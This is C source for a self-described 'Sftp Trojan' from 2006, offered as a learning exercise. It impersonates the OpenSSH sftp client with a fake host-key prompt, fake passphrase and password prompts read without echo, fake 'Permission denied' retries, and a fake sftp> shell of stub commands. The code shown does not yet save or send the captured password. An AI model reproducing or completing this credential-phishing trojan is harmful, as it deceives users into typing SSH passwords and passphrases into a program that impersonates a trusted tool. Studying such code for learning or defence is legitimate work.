/* * Sftp Trojan * by Javantea aka. Joel R. Voss * Feb 27, 2006 * * This program is written for the purpose of learning about trojans and to * replicate the useful sftp interface for udp_sess1. */ #include #include #include #include #include void print_hex(char *data, int length) { int i; for(i=0; i < length - 1; i++) { printf("%02x:", data[i]); } printf("%02x", data[length - 1]); } void usage() { printf("usage: sftp [-1Cv] [-B buffer_size] [-b batchfile] [-F ssh_config]\n" " [-o ssh_option] [-P sftp_server_path] [-R num_requests]\n" " [-S program] [-s subsystem | sftp_server] host\n" " sftp [[user@]host[:file [file]]]\n" " sftp [[user@]host[:dir[/]]]\n" " sftp -b batchfile [user@]host\n"); } void sftp_help() { printf("Available commands:\n" "cd path Change remote directory to 'path'\n" "lcd path Change local directory to 'path'\n" "chgrp grp path Change group of file 'path' to 'grp'\n" "chmod mode path Change permissions of file 'path' to 'mode'\n" "chown own path Change owner of file 'path' to 'own'\n" "help Display this help text\n" "get remote-path [local-path] Download file\n" "lls [ls-options [path]] Display local directory listing\n" "ln oldpath newpath Symlink remote file\n" "lmkdir path Create local directory\n" "lpwd Print local working directory\n" "ls [path] Display remote directory listing\n" "lumask umask Set local umask to 'umask'\n" "mkdir path Create remote directory\n" "progress Toggle display of progress meter\n" "put local-path [remote-path] Upload file\n" "pwd Display remote working directory\n" "exit Quit sftp\n" "quit Quit sftp\n" "rename oldpath newpath Rename remote file\n" "rmdir path Remove remote directory\n" "rm path Delete remote file\n" "symlink oldpath newpath Symlink remote file\n" "version Show SFTP version\n" "!command Execute 'command' in local shell\n" "! Escape to local shell\n" "? Synonym for help\n"); } void sftp_ls(char *arg, int length) { } void sftp_cd(char *arg, int length) { } void sftp_lcd(char *arg, int length) { } void sftp_chmod(char *arg, int length) { } void sftp_chgrp(char *arg, int length) { } void sftp_get(char *arg, int length) { } void sftp_put(char *arg, int length) { } void sftp_lls(char *arg, int length) { // TODO: Local ls should be pretty easy to fake. fork ls maybe? } void sftp_lumask(char *arg, int length) { } void sftp_ln(char *arg, int length) { } void sftp_progress(char *arg, int length) { // TODO: enable also. printf("Progress meter disabled\n"); } void sftp_pwd(char *arg, int length) { } void sftp_rename(char *arg, int length) { } void sftp_rmdir(char *arg, int length) { } void sftp_rm(char *arg, int length) { } void sftp_symlink(char *arg, int length) { } void sftp_version(char *arg, int length) { printf("SFTP protocol version 3\n"); } void sftp_bang(char *arg, int length) { } void sftp_mkdir(char *arg, int length) { } void get_password(char *password, int length) { struct termios termios_old, termios_noecho; int ne = tcgetattr(fileno(stdin), &termios_old); memcpy(&termios_noecho, &termios_old, sizeof(struct termios)); termios_noecho.c_lflag &= ~ECHO; ne = tcsetattr(fileno(stdin), TCSANOW, &termios_noecho); fgets(password, length, stdin); ne = tcsetattr(fileno(stdin), TCSANOW, &termios_old); } int check_password(char *password, int length) { password[length] = 0; if(strlen(password) > 6) return 1; return 0; } int rand_err1() { printf("Read from socket failed: Connection reset by peer\n"); return 1; } int main(int argc, char **argv) { int ret = 0; if(argc < 2) { usage(); return 1; } char user[256]; strncpy(user, getenv("USER"), 256); char *hostname = argv[1]; char host_addr[] = "::1"; char fingerprint[] = "AAAAbbbbCCCCdddd"; printf("Connecting to %s...\n", hostname); usleep(300); int authenticity = 0; if(authenticity == 0) { printf("The authenticity of host '%s(%s)' can't be established.\n", hostname, host_addr); printf("RSA key fingerprint is "); print_hex(fingerprint, 16); //06:4b:ca:5c:57:6a:7a:3c:d5:3b:dd:39:fb:b2:0e:da.; printf("\n"); printf("Are you sure you want to continue connecting (yes/no)? "); char yes[5]; fgets(yes, 5, stdin); if(strncmp(yes, "yes", 3) == 0) { printf("Warning: Permanently added '%s' (RSA) to the list of known hosts.\n", hostname); } else { return 1; } } char buf[256]; int dsa = 1; while(1) { if(dsa == 1) { printf("Enter passphrase for key '/home/jvoss/.ssh/id_dsa': "); get_password(buf, 255); } else { printf("%s@%s's password: ", user, hostname); get_password(buf, 255); } // They gave up, so will we. if(feof(stdin)) { printf("\n"); return 1; } printf("\n"); if(check_password(buf, 256) == 0) { printf("Permission denied, please try again.\n"); } else { break; } } while(!feof(stdin)) { printf("sftp> "); fgets(buf, 255, stdin); if(strncmp(buf, "help", 4) == 0 || strncmp(buf, "?", 1) == 0) { sftp_help(); } else if(strncmp(buf, "cd", 2) == 0) { sftp_cd(buf, 256); } else if(strncmp(buf, "lcd", 3) == 0) { sftp_lcd(buf, 256); } else if(strncmp(buf, "chmod", 5) == 0) { sftp_chmod(buf, 256); } else if(strncmp(buf, "chgrp", 5) == 0) { sftp_chgrp(buf, 256); } else if(strncmp(buf, "get", 3) == 0) { sftp_get(buf, 256); } else if(strncmp(buf, "put", 3) == 0) { sftp_put(buf, 256); } else if(strncmp(buf, "ls", 2) == 0) { sftp_ls(buf, 256); } else if(strncmp(buf, "lls", 3) == 0) { sftp_lls(buf, 256); } else if(strncmp(buf, "lumask", 6) == 0) { sftp_lumask(buf, 256); } else if(strncmp(buf, "ln", 2) == 0) { sftp_ln(buf, 256); } else if(strncmp(buf, "progress", 8) == 0) { sftp_progress(buf, 256); } else if(strncmp(buf, "pwd", 3) == 0) { sftp_pwd(buf, 256); } else if(strncmp(buf, "rename", 6) == 0) { sftp_rename(buf, 256); } else if(strncmp(buf, "rmdir", 5) == 0) { sftp_rmdir(buf, 256); } else if(strncmp(buf, "rm", 2) == 0) { sftp_rm(buf, 256); } else if(strncmp(buf, "symlink", 7) == 0) { sftp_symlink(buf, 256); } else if(strncmp(buf, "version", 7) == 0) { sftp_version(buf, 256); } else if(strncmp(buf, "!", 1) == 0) { sftp_bang(buf, 256); } else if(strncmp(buf, "dir", 3) == 0) { sftp_ls(buf, 256); } else if(strncmp(buf, "mkdir", 5) == 0) { sftp_mkdir(buf, 256); } else if(strncmp(buf, "quit", 4) == 0 || strncmp(buf, "exit", 4) == 0) { break; } else { printf("Invalid command.\n"); } } // Put the command prompt on the next line. if(feof(stdin)) printf("\n"); return ret; }